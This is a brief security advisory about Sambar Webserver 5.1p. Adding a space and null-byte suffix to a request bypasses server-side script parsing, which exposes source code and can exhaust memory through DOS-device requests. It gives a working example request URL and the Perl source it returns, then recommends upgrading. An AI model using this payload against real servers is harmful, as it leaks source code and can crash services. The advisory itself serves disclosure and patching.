COMMAND
	Sambar webserver server-side fileparsing bypassed
SYSTEMS AFFECTED
	 Sambar Webserver V5.1p on Windows 2000
	 (Other versions were not tested)
PROBLEM
	In Peter Gründl of KPMG Denmark advisory [BUG-ID: 2002012] :
	It is possible to bypass the serverside  parsing  of  scripts,  such  as
	.pl, .jsp, .asp, .stm and download the sourcecode.  The  bypassing  also
	opens up for a request to certain  DOS-devices  that  the  server  would
	then attempt to access. These ressources used in such requests  are  not
	freed properly and as a result, the web server will eventually  run  out
	of memory and the operating system will kill the web service.
	To bypass the serverside parsing, an attacker would have to  access  the
	ressource with a suffix of <space><null>. There are a lot of  ways
	to achieve this in eg. Internet Explorer, and an example  of  sourcecode
	exposure could be:
	
	http://server/cgi-bin/environ.pl+%00
	
	which would return the following (perl sourcecode):
	
	read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
	print< GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
	PATH_INFO:  $ENV{'PATH_INFO'}
	PATH_TRANSLATED:  $ENV{'PATH_TRANSLATED'}
	QUERY_STRING:  $ENV{'QUERY_STRING'}
	REMOTE_ADDR:  $ENV{'REMOTE_ADDR'}
	REMOTE_HOST:  $ENV{'REMOTE_HOST'}
	REMOTE_USER:  $ENV{'REMOTE_USER'}
	REQUEST_METHOD:  $ENV{'REQUEST_METHOD'}
	DOCUMENT_NAME:  $ENV{'DOCUMENT_NAME'}
	DOCUMENT_URI:  $ENV{'DOCUMENT_URI'}
	SCRIPT_NAME:  $ENV{'SCRIPT_NAME'}
	SCRIPT_FILENAME:  $ENV{'SCRIPT_FILENAME'}
	SERVER_NAME:  $ENV{'SERVER_NAME'}
	SERVER_PORT:  $ENV{'SERVER_PORT'}
	SERVER_PROTOCOL:  $ENV{'SERVER_PROTOCOL'}
	SERVER_SOFTWARE:  $ENV{'SERVER_SOFTWARE'}
	CONTENT_LENGTH:  $ENV{'CONTENT_LENGTH'}
	CONTENT:  $CONTENT
	END
	
SOLUTION
	Get Version 5.2b, which is available here:
	
	http://sambar.dnsalias.org/win32-preview.tar.gz